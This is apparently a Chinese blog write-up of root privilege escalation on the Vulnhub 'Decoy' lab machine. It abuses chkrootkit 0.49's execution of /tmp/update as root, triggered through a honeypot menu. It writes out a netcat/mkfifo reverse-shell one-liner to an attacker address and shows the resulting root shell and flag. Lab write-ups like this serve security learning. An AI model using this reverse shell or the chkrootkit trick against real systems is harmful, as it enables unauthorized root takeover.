Vulnhub Decoy提权补充
在拿到用户296640a3b825115a47b68fc44501c828的密码server后,为了方便观察现象,同时开启两个shell,并且需要指定-t "bash --noprofile"以逃避受限shell,登录成功后,要修改PATH环境变量,使其包含正常的环境变量:
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/bin:/sbin
296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~$ cat SV-502/logs/log.txt
在日志文件中看到有关chkrootkit的日志信息,chkrootkit是检查系统是否存在后门的工具。
在第1个目标主机shell中执行:
296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~$ ps aux | grep chk
296640a+ 23309 0.0 0.0 6076 828 pts/1 S+ 22:49 0:00 grep chk
从结果发现并没有运行chkrootkit的进程
在第2个shell中执行:
296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~$ ./honeypot.decoy
--------------------------------------------------
Welcome to the Honey Pot administration manager (HPAM). Please select an option.
1 Date.
2 Calendar.
3 Shutdown.
4 Reboot.
5 Launch an AV Scan.
6 Check /etc/passwd.
7 Leave a note.
8 Check all services status.
Option selected:5
The AV Scan will be launched in a minute or less.
--------------------------------------------------
执行第5选项,也就是病毒扫描,而这可能与chkrootkit相关,也就是一旦选择第5选项,可能就启动chkrootkit。
选择第5选项后,回到第1个shell查看进程:
但是仍然没有出现chkrootkit
此时参考exploitdb上关于0.49版本的漏洞利用方法,在/tmp创建文件名为update,此时内容随意并且赋予执行权限:
Steps to reproduce:
- Put an executable file named 'update' with non-root owner in /tmp (not
mounted noexec, obviously)
- Run chkrootkit (as uid 0)
然后执行honeypot.decoy
此时回到第1个shell中查看进程(需要过一点时间)
296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~$ ps aux | grep chk
296640a+ 560 0.0 0.0 6076 884 pts/1 S+ 22:59 0:00 grep chk
296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~$ ps aux | grep chk
296640a+ 562 0.0 0.0 6076 820 pts/1 S+ 23:00 0:00 grep chk
296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~$ ps aux | grep chk
root 571 2.0 0.1 2676 1936 ? S 23:00 0:00 /bin/sh /root/chkrootkit-0.49/chkrootkit
发现PS输出结果中有chkrootkit进程,当然到目前为止我们创建的update文件里面的内容是没有意义的字符串,接下来就是修改update的内容,修改为反向shell命令:
296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~$ echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.56.230 5555 >/tmp/f' >/tmp/update
296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~$ chmod 777 /tmp/update
然后再次执行./honeypot.decoy,选择选项5,也就是扫描病毒,
296640a3b825115a47b68fc44501c828@60832e9f188106ec5bcc4eb7709ce592:~$ ./honeypot.decoy
--------------------------------------------------
Welcome to the Honey Pot administration manager (HPAM). Please select an option.
1 Date.
2 Calendar.
3 Shutdown.
4 Reboot.
5 Launch an AV Scan.
6 Check /etc/passwd.
7 Leave a note.
8 Check all services status.
Option selected:5
The AV Scan will be launched in a minute or less.
--------------------------------------------------
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Decoy]
└─$ sudo nc -nlvp 5555
[sudo] password for kali:
listening on [any] 5555 ...
connect to [192.168.56.230] from (UNKNOWN) [192.168.56.109] 48104
/bin/sh: 0: can't access tty; job control turned off
# cd /root
# ls -alh
total 3.1M
drwx------ 4 root root 4.0K Jul 7 2020 .
drwxr-xr-x 18 root root 4.0K Jun 27 2020 ..
lrwxrwxrwx 1 root root 9 Jul 7 2020 .bash_history -> /dev/null
-rw-r--r-- 1 root root 570 Jan 31 2010 .bashrc
drwxr-xr-x 2 296640a3b825115a47b68fc44501c828 296640a3b825115a47b68fc44501c828 4.0K Jul 30 2009 chkrootkit-0.49
-rw-r--r-- 1 root root 39K Apr 9 2015 chkrootkit-0.49.tar.gz
drwxr-xr-x 3 root root 4.0K Jun 27 2020 .local
-rw-r--r-- 1 root root 7.7K Jun 27 2020 log.txt
-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
-rwxr-xr-x 1 root root 3.0M Aug 22 2019 pspy
-rw-r--r-- 1 root root 924 Jul 7 2020 root.txt
-rw-r--r-- 1 root root 137 Jul 7 2020 script.sh
-rw-r--r-- 1 root root 66 Jul 7 2020 .selected_editor
-rw-r--r-- 1 root root 208 Jun 27 2020 .wget-hsts
# cat root.txt
........::::::::::::.. .......|...............::::::::........
.:::::;;;;;;;;;;;:::::.... . \ | ../....::::;;;;:::::.......
. ........... / \\_ \ | / ...... . ........./\
...:::../\\_ ...... ..._/' \\\_ \###/ /\_ .../ \_....... _//
.::::./ \\\ _ .../\ /' \\\\#######// \/\ // \_ ....////
_/ \\\\ _/ \\\ / x \\\\###//// \//// \__ _/////
./ x \\\/ \/ x X \////// \/////
/ XxX \\/ XxX X //// x
-----XxX-------------|-------XxX-----------*--------|---*-----|------------X--
X _X * X ** ** x ** * X
_X _X x * x X_
1c203242ab4b4509233ca210d50d2cc5
Thanks for playing! - Felipe Winsnes (@whitecr0wz)
#
标签:chkrootkit,--,Decoy,提权,2020,Vulnhub,296640a3b825115a47b68fc44501c828,root,60832e
From: https://www.cnblogs.com/jason-huawen/p/17442706.html